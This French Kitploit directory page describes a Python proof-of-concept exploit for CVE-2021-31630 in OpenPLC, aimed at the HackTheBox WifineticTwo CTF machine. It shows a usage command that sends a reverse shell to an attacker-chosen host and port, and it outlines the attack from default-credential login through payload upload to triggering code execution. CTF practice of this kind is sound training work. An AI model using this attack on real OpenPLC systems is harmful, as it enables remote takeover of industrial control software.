Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
htb-wifinetictwo-exploit — Un simple script Python pour exploiter CVE-2021-31630 sur HTB WifineticTwo CTF | Kitploit
Outils/GitHubGitHub/behindsecurity/htb-wifinetictwo-exploit
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCTFApprentissage et ÉducationOutil d'Accès à DistanceExploitation de Binaires

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
behindsecurity/htb-wifinetictwo-exploit

htb-wifinetictwo-exploit

Un simple script Python pour exploiter CVE-2021-31630 sur HTB WifineticTwo CTF

Voir le dépôt
il y a 2 ansPas encore vérifié

CVE-2021-31630 Preuve de concept (PoC) d'exploit

Ce script Python est une preuve de concept (PoC) d'exploit pour CVE-2021-31630, ciblant une vulnérabilité dans OpenPLC exécuté sur la machine WifineticTwo chez HackTheBox. Il est conçu uniquement à des fins éducatives, visant à démontrer le processus d'exploitation dans un environnement contrôlé.

Avertissement

Cet outil est destiné uniquement à des fins de recherche en sécurité et d'éducation. L'utilisation de cet outil pour attaquer des cibles sans consentement mutuel préalable est illégale. Le développeur ne sera tenu responsable d'aucun dommage ou poursuite pénale contre les utilisateurs qui abusent de cet exploit.

Prérequis

Avant d'exécuter cet exploit, assurez-vous d'avoir :

  • Python 3 installé sur votre système.
  • La bibliothèque requests installée. Vous pouvez l'installer en utilisant pip install requests.

Utilisation

Pour utiliser cet exploit, vous devez spécifier l'URL de la cible, l'adresse IP de l'hôte local (LHOST) et le port local (LPORT) auquel le reverse shell doit se connecter. Optionnellement, vous pouvez spécifier le nom d'utilisateur et le mot de passe pour OpenPLC s'ils diffèrent des valeurs par défaut.

root@kitploit:~
./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]

Arguments

  • --target - Adresse de base de la cible. Exemple : http://wifinetictwo.htb:8080
  • --lhost - Adresse IP de l'hôte local pour la connexion du reverse shell.
  • --lport - Port local pour la connexion du reverse shell.
  • --usr - (Optionnel) Nom d'utilisateur pour OpenPLC. La valeur par défaut est openplc.
  • --pwd - (Optionnel) Mot de passe pour OpenPLC. La valeur par défaut est openplc.

Fonctionnalités

  • Gère automatiquement le processus de connexion en utilisant les identifiants fournis.
  • Crée et téléverse une charge utile malveillante pour parvenir à une exécution de code à distance.
  • Lance un reverse shell vers l'IP et le port spécifiés par l'attaquant.

Processus d'exploit

  1. Connexion : Le script se connecte à l'application OpenPLC en utilisant les identifiants fournis.
  2. Création de la charge utile : Crée dynamiquement une charge utile malveillante conçue pour lancer un reverse shell.
  3. Téléversement de la charge utile : Téléverse la charge utile créée sur le serveur.
  4. Déclenchement de l'exploit : Déclenche l'exploit en tentant de compiler le code malveillant téléversé, ce qui entraîne un reverse shell.

Remerciements

  • Un grand merci à Fellipe Oliveira qui a découvert et signalé CVE-2021-31630.
  • HackTheBox pour avoir fourni un environnement réaliste pour pratiquer et apprendre la cybersécurité.
Télécharger l’outil